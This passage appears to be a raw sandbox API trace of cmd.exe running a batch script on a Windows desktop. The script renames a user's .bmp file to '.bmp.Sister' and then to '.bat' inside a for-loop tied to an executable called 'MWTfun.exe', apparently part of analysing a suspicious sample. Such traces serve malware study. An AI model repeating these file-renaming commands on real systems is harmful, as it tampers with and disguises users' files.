ftCreationTime.dwLowDateTime=0x2c0f1650, ftCreationTime.dwHighDateTime=0x1d5e376, ftLastAccessTime.dwLowDateTime=0x16dfbdd0, ftLastAccessTime.dwHighDateTime=0x1d5e0d7, ftLastWriteTime.dwLowDateTime=0x16dfbdd0, ftLastWriteTime.dwHighDateTime=0x1d5e0d7, nFileSizeHigh=0x0, nFileSizeLow=0x81a5, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="Z31qy U6YA31zG.bmp", cAlternateFileName="")) returned 1 [0202.535] GetProcessHeap () returned 0x21ed8c70000 [0202.535] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d6b0, Size=0x538) returned 0x21ed9a559e0 [0202.536] GetProcessHeap () returned 0x21ed8c70000 [0202.536] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a559e0) returned 0x538 [0202.536] GetProcessHeap () returned 0x21ed8c70000 [0202.536] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95778f0 [0202.536] GetProcessHeap () returned 0x21ed8c70000 [0202.536] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95778f0, Size=0x30) returned 0x21ed95778f0 [0202.536] GetProcessHeap () returned 0x21ed8c70000 [0202.536] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95778f0) returned 0x30 [0202.536] GetProcessHeap () returned 0x21ed8c70000 [0202.536] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9577930 [0202.537] malloc (_Size=0x1ff9c) returned 0x21ed973fd00 [0202.538] GetProcessHeap () returned 0x21ed8c70000 [0202.538] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed937aaf0 [0202.538] ??_V@YAXPEAX@Z () returned 0x1 [0202.538] GetProcessHeap () returned 0x21ed8c70000 [0202.538] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9577930, Size=0x1a0) returned 0x21ed9577930 [0202.538] GetProcessHeap () returned 0x21ed8c70000 [0202.538] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9577930) returned 0x1a0 [0202.538] GetProcessHeap () returned 0x21ed8c70000 [0202.538] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9577ae0 [0202.538] GetProcessHeap () returned 0x21ed8c70000 [0202.538] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9577ae0, Size=0x290) returned 0x21ed9577ae0 [0202.538] GetProcessHeap () returned 0x21ed8c70000 [0202.538] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9577ae0) returned 0x290 [0202.538] GetProcessHeap () returned 0x21ed8c70000 [0202.538] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9577d80 [0202.538] GetProcessHeap () returned 0x21ed8c70000 [0202.574] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9577d80, Size=0x30) returned 0x21ed9577d80 [0202.574] GetProcessHeap () returned 0x21ed8c70000 [0202.574] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9577d80) returned 0x30 [0202.574] GetProcessHeap () returned 0x21ed8c70000 [0202.574] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9577dc0 [0202.574] malloc (_Size=0x1ff9c) returned 0x21ed973fd00 [0202.574] GetProcessHeap () returned 0x21ed8c70000 [0202.574] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed937ae30 [0202.574] ??_V@YAXPEAX@Z () returned 0x1 [0202.574] malloc (_Size=0x1ff9c) returned 0x21ed973fd00 [0202.574] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a14b20 [0202.575] FindClose (in: hFindFile=0x21ed9a14b20 | out: hFindFile=0x21ed9a14b20) returned 1 [0202.575] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14820 [0202.575] FindClose (in: hFindFile=0x21ed9a14820 | out: hFindFile=0x21ed9a14820) returned 1 [0202.575] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa258725c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa258725c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14d60 [0202.575] FindClose (in: hFindFile=0x21ed9a14d60 | out: hFindFile=0x21ed9a14d60) returned 1 [0202.575] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Z31qy U6YA31zG.bmp", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c0f1650, ftCreationTime.dwHighDateTime=0x1d5e376, ftLastAccessTime.dwLowDateTime=0x16dfbdd0, ftLastAccessTime.dwHighDateTime=0x1d5e0d7, ftLastWriteTime.dwLowDateTime=0x16dfbdd0, ftLastWriteTime.dwHighDateTime=0x1d5e0d7, nFileSizeHigh=0x0, nFileSizeLow=0x81a5, dwReserved0=0x4, dwReserved1=0x80, cFileName="Z31qy U6YA31zG.bmp", cAlternateFileName="Z31QYU~1.BMP")) returned 0x21ed9a14ca0 [0202.575] FindClose (in: hFindFile=0x21ed9a14ca0 | out: hFindFile=0x21ed9a14ca0) returned 1 [0202.576] _wcsnicmp (_String1="Z31QYU~1.BMP", _String2="Z31qy U6YA31zG.bmp", _MaxCount=0x12) returned 85 [0202.576] malloc (_Size=0x1ff9c) returned 0x21ed975fcb0 [0202.576] ??_V@YAXPEAX@Z () returned 0x21ed975fcb0 [0202.577] GetProcessHeap () returned 0x21ed8c70000 [0202.577] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed937a830 [0202.577] ??_V@YAXPEAX@Z () returned 0x1 [0202.577] ??_V@YAXPEAX@Z () returned 0x1 [0202.577] GetProcessHeap () returned 0x21ed8c70000 [0202.577] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9577dc0, Size=0x1a0) returned 0x21ed9577dc0 [0202.577] GetProcessHeap () returned 0x21ed8c70000 [0202.577] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9577dc0) returned 0x1a0 [0202.577] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0202.577] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.578] GetFileType (hFile=0x50) returned 0x2 [0202.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.578] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0202.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.604] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0202.611] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.611] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0202.611] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0202.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.611] GetFileType (hFile=0x50) returned 0x2 [0202.611] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.611] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0202.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.612] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0202.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.612] GetFileType (hFile=0x50) returned 0x2 [0202.612] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.612] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.613] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9577900*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9577900*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.613] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Z31qy U6YA31zG.bmp\" \"Z31qy U6YA31zG.bmp.Sister\" ") returned 50 [0202.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.613] GetFileType (hFile=0x50) returned 0x2 [0202.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.613] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.614] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0202.614] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0202.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.614] GetFileType (hFile=0x50) returned 0x2 [0202.614] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.614] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.615] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.616] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0202.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.616] GetFileType (hFile=0x50) returned 0x2 [0202.616] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.616] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.617] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0202.618] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0202.621] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.621] GetFileType (hFile=0x50) returned 0x2 [0202.621] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.621] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.623] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.623] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0202.624] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0202.625] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.625] GetFileType (hFile=0x50) returned 0x2 [0202.625] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.625] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.625] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.625] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0202.629] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.629] GetFileType (hFile=0x50) returned 0x2 [0202.629] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.630] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.630] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9577d90*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9577d90*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.631] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bat\" ") returned 50 [0202.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.631] GetFileType (hFile=0x50) returned 0x2 [0202.631] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.631] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.631] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0202.632] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0202.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.632] GetFileType (hFile=0x50) returned 0x2 [0202.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.632] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0202.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.632] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0202.639] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.639] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.640] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.640] malloc (_Size=0xffce) returned 0x21ed973fd00 [0202.640] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0202.640] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.640] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.640] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.640] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.640] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.640] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.640] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.640] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.640] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.640] ??_V@YAXPEAX@Z () returned 0x1 [0202.640] GetProcessHeap () returned 0x21ed8c70000 [0202.640] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d6cc00 [0202.640] GetProcessHeap () returned 0x21ed8c70000 [0202.640] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6cc00, Size=0x74) returned 0x21ed8d6cc00 [0202.640] GetProcessHeap () returned 0x21ed8c70000 [0202.640] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6cc00) returned 0x74 [0202.640] GetProcessHeap () returned 0x21ed8c70000 [0202.641] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed93794b0 [0202.641] GetProcessHeap () returned 0x21ed8c70000 [0202.641] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d6dde0 [0202.641] GetProcessHeap () returned 0x21ed8c70000 [0202.641] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6dde0, Size=0x74) returned 0x21ed8d6dde0 [0202.641] GetProcessHeap () returned 0x21ed8c70000 [0202.641] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6dde0) returned 0x74 [0202.641] malloc (_Size=0xffce) returned 0x21ed973fd00 [0202.641] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0202.641] GetProcessHeap () returned 0x21ed8c70000 [0202.641] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14760 [0202.641] GetProcessHeap () returned 0x21ed8c70000 [0202.641] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9576c60 [0202.641] _wcsicmp (_String1="Z31qy U6YA31zG.bmp", _String2=".") returned 76 [0202.641] _wcsicmp (_String1="Z31qy U6YA31zG.bmp", _String2="..") returned 76 [0202.641] GetFileAttributesW (lpFileName="Z31qy U6YA31zG.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\z31qy u6ya31zg.bmp")) returned 0x20 [0202.642] GetProcessHeap () returned 0x21ed8c70000 [0202.642] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a55f20 [0202.643] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a55f30 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.643] SetErrorMode (uMode=0x0) returned 0x0 [0202.643] SetErrorMode (uMode=0x1) returned 0x0 [0202.643] GetFullPathNameW (in: lpFileName="Z31qy U6YA31zG.bmp", nBufferLength=0x7fe7, lpBuffer=0x21ed973fd00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Z31qy U6YA31zG.bmp", lpFilePart=0xa6cf4fd660*="Z31qy U6YA31zG.bmp") returned 0x2a [0202.644] SetErrorMode (uMode=0x0) returned 0x1 [0202.644] GetProcessHeap () returned 0x21ed8c70000 [0202.644] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9576ed0 [0202.644] _wcsicmp (_String1="Z31qy U6YA31zG.bmp", _String2=".") returned 76 [0202.644] _wcsicmp (_String1="Z31qy U6YA31zG.bmp", _String2="..") returned 76 [0202.644] GetFileAttributesW (lpFileName="Z31qy U6YA31zG.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\z31qy u6ya31zg.bmp")) returned 0x20 [0202.644] ??_V@YAXPEAX@Z () returned 0x1 [0202.644] malloc (_Size=0xffce) returned 0x21ed973fd00 [0202.644] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0202.644] malloc (_Size=0xffce) returned 0x21ed974fce0 [0202.644] ??_V@YAXPEAX@Z () returned 0x21ed974fce0 [0202.644] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Z31qy U6YA31zG.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\z31qy u6ya31zg.bmp")) returned 0x20 [0202.644] malloc (_Size=0xffce) returned 0x21ed975fcc0 [0202.644] ??_V@YAXPEAX@Z () returned 0x21ed975fcc0 [0202.644] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Z31qy U6YA31zG.bmp", fInfoLevelId=0x1, lpFindFileData=0x21ed9576c70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9576c70) returned 0x21ed9a14e20 [0202.645] malloc (_Size=0xffce) returned 0x21ed976fca0 [0202.645] ??_V@YAXPEAX@Z () returned 0x21ed976fca0 [0202.645] ??_V@YAXPEAX@Z () returned 0x1 [0202.645] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Z31qy U6YA31zG.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\z31qy u6ya31zg.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Z31qy U6YA31zG.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\z31qy u6ya31zg.bmp.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0202.647] FindNextFileW (in: hFindFile=0x21ed9a14e20, lpFindFileData=0x21ed9576c70 | out: lpFindFileData=0x21ed9576c70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c0f1650, ftCreationTime.dwHighDateTime=0x1d5e376, ftLastAccessTime.dwLowDateTime=0x16dfbdd0, ftLastAccessTime.dwHighDateTime=0x1d5e0d7, ftLastWriteTime.dwLowDateTime=0x16dfbdd0, ftLastWriteTime.dwHighDateTime=0x1d5e0d7, nFileSizeHigh=0x0, nFileSizeLow=0x81a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z31qy U6YA31zG.bmp", cAlternateFileName="")) returned 0 [0202.648] GetLastError () returned 0x12 [0202.648] FindClose (in: hFindFile=0x21ed9a14e20 | out: hFindFile=0x21ed9a14e20) returned 1 [0202.648] ??_V@YAXPEAX@Z () returned 0x1 [0202.648] ??_V@YAXPEAX@Z () returned 0x1 [0202.648] ??_V@YAXPEAX@Z () returned 0x1 [0202.648] ??_V@YAXPEAX@Z () returned 0x1 [0202.650] GetProcessHeap () returned 0x21ed8c70000 [0202.650] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14820 [0202.650] GetProcessHeap () returned 0x21ed8c70000 [0202.650] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95560, Size=0x16) returned 0x21ed8c955e0 [0202.650] GetProcessHeap () returned 0x21ed8c70000 [0202.650] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c955e0) returned 0x16 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6d1b0 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d1b0, Size=0xb2) returned 0x21ed8d6d1b0 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d1b0) returned 0xb2 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9577f70 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9577f70, Size=0x30) returned 0x21ed9577f70 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9577f70) returned 0x30 [0202.651] GetProcessHeap () returned 0x21ed8c70000 [0202.651] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9577fb0 [0202.651] malloc (_Size=0x1ff9c) returned 0x21ed973fd00 [0202.655] GetProcessHeap () returned 0x21ed8c70000 [0202.655] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9571880 [0202.655] GetProcessHeap () returned 0x21ed8c70000 [0202.655] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9571640 [0202.655] ??_V@YAXPEAX@Z () returned 0x1 [0202.655] malloc (_Size=0x1ff9c) returned 0x21ed973fd00 [0202.655] GetProcessHeap () returned 0x21ed8c70000 [0202.655] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9571a00 [0202.655] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed973fd00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0202.655] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, 